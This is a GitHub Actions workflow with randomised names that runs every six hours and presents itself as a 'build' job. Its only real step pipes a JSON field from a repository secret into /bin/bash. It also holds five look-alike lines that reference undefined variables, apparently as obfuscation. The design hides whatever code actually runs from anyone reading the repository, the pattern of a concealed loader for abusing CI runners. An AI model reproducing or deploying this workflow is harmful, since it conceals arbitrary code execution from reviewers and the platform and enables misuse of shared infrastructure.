name: weijiewen1987

on:
  workflow_dispatch:
  schedule:
    - cron: '15 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: weijiewen1987
        env:
          vz4768: ${{ secrets.vz4768 }}
        run: |
          echo $vz4768 | jq -r .avxw5260 | /bin/bash
          echo $jp37 | jq -r .fd492 | /bin/bash
          echo $crs2 | jq -r .dug4462 | /bin/bash
          echo $qxhz80486 | jq -r .a34 | /bin/bash
          echo $cunwt978 | jq -r .uaayh375 | /bin/bash
          echo $o24 | jq -r .cnmo54939 | /bin/bash

